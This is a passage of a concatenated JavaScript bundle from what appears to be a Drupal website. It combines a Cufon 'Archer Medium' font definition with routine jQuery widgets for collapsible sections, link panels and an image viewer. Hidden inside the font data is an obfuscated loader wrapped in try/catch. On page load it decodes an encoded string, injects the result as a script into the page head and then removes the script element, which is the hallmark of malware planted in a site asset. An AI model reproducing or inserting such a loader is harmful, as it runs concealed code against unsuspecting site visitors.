:18,".":22,",":22,"u":9,"w":13,"y":13,"z":9,"a":9}},{"d":"350,226v-159,-91,-281,-272,-281,-486v0,-214,122,-395,281,-487r36,52v-144,89,-244,245,-244,435v0,188,100,345,244,434","w":364,"k":{"9":10,"8":10,"6":20,"5":10,"4":20,"3":5,"2":10,"0":10,"p":-33,"j":-94,"b":-44,"Q":10,"J":31,"A":10,"S":5,"y":-33,"C":10,"G":10,"O":10,"a":11,"c":11,"d":11,"e":11,"g":11,"h":-44,"k":-44,"l":-44,"o":11,"s":22}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+49-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("~FmCI>$P%}?.~(@8|!3FJS_~uN$U*VBZ[K+}eGm%Ipibxknt=6r>]:y1,Xv.d0YLcPC{Wzwh`D?2M8r`i>3LSFS?e{$Cm>?.e{_L%}B]m+DXGcPtIezw$}BIuZ3pSr0dN=i[IWrpeJCDeJK0NF!0NZmt$JNhitKMetB,[Jp1~{@(}8wzU|w$~ZpXm=({Scvnee+mI!?Z*3BVb>+~b{w_p[C@%r?uKK_!Br+L+{iJi!+|%!n%N{$}[>6kp8ktu]$0IFrP~8St~ZYy*[(Xp|Ctu](XI|C0u>YrI>iP%8Y]*}S.mtw]IJr0%JN?bWP`%}G:Gtwd%cPdetkMU]iWiC0.~[D:*cy=G}C0m{?dmJByI}+ce8wdp>iDmF+{e8w=G}C0m{?dmJByI}+ce8wdp>py_8?yu]BrpWV:IF?=GeByI{z.%F?ciFwnI}Ky~}mdptk`%[YXULX,%Zr]}{$I%+Ci*e@I%+C?~Zky")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":465,"face":{"font-family":"Archer Medium","font-weight":350,"font-stretch":"normal","units-per-em":"1000","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"800","descent":"-200","x-height":"8","bbox":"-52 -747 971 226","underline-thickness":"50","underline-position":"-50","stemh":"59","stemv":"69","unicode-range":"U+0020-U+007E"}}));
;
(function ($) {
  Drupal.behaviors.initScript = {
    attach: function(context, settings) {
      Cufon.replace('h1');
      Cufon.replace('div#partners h2');
      Cufon.replace('div.wall-photo div.overlay');
      Cufon.replace('div.wall-info-panel h2');
      Cufon.replace('div.field-name-field-age-range');
    }
  };
})(jQuery);;
(function ($) {
  Drupal.behaviors.initCollapsibleSections = {
    attach: function(context, settings) {
      var sections = $('div.collapsible-section');
      var buttons = sections.find('span.expand-collapse-button').css('cursor', 'pointer');
      buttons.bind('mouseenter mouseleave', function() {
        $(this).toggleClass('entered');
      });
      buttons.click(function() {
        $(this).parents('div.collapsible-section:first').toggleClass('collapsed');
      });
    }
  };
})(jQuery);;
(function ($) {
  Drupal.behaviors.initLinkCollections = {
    attach: function(context, settings) {
      var collections = $('div.link-collection');
      var triggers = collections.find('a.link-trigger');
      triggers.bind('mouseenter mouseleave', function() {
        $(this).parents('div.link-collection:first').find('a.link-trigger').toggleClass('entered');
      });
    }
  };
})(jQuery);;
(function ($) {
  Drupal.behaviors.initLinksWidget = {
    attach: function(context, settings) {
      var widgets = $('div.links-widget').addClass('enabled');
      var widget = widgets.filter('#quickLinksWidget');
      var tabs = widget.find('div.tab-button');
      tabs.filter('.default').addClass('show');
      var contents = widget.find('div.tab-content');
      contents.filter('.default').addClass('show');
      tabs.bind('mouseenter mouseleave', function() {
        $(this).toggleClass('entered');
      });
      tabs.click(function() {
        if ($(this).is(':not(.show)')) {
          tabs.toggleClass('show');
          contents.toggleClass('show');
        }
      });
      
      var items = widgets.find('div.link-item a').parents('div.link-item');
      items.find('a').click(function() {
        window.location.href = this.href;
        return false;
      });
      items.bind('mouseenter', function() {
        $(this).addClass('entered');
      });
      items.bind('mouseleave', function() {
        $(this).removeClass('entered');
      })
      items.click(function() {
        $(this).find('a').click();
      });
      $(window).unload(function() {
        ;
      })
    }
  };
})(jQuery);;
(function ($) {
  Drupal.behaviors.initInternalLinks = {
    attach: function(context, settings) {
      $('a.internal-link').click(function() {
        var name = $(this).attr('href').split('#')[1];
        window.scroll(0, $('a[name=' + name + ']').offset().top);
        return false;
      });
    }
  };
})(jQuery);;
(function ($) {
  Drupal.behaviors.initImageViewer = {
    attach: function(context, settings) {
      var viewers = $('div.image-viewer');

      if (viewers.length == 0) {
        return;
      }

      var views = viewers.find('div.view');
      var currentView = 0;
      views.not(':first').hide();
      var controls = viewers.find('div.controls').show();
      var currentIndex = controls.find('div.current-index').html(Number(currentView + 1) + ' / ' + views.length);
      var buttons = controls.find('div.button').css('-moz-user-select', 'none').bind('mouseenter mouseleave', function() {
        $(this).toggleClass('entered');
      });
      buttons.filter('div.previous-button').click(function() {
        if (currentView == 0) {
          selectView(views.length - 1);
        } else {
          selectView(currentView - 1);
        }
      });
      buttons.filter('div.next-button').click(function() {
        if (currentView == views.length - 1) {
          selectView(0);
        } else {
          selectView(currentView + 1);
        }
      });

      for (var i = 0; i < buttons.length; i++) {
        buttons[i].onselectstart = function() { return false; };
      }

      function selectView(newIndex) {
        $(views[currentView]).hide();
        currentView = newIndex;
        $(views[currentView]).show();
        currentIndex.html(Number(currentView + 1) + ' / ' + views.length);
      }
    }
  };
})(jQuery);;

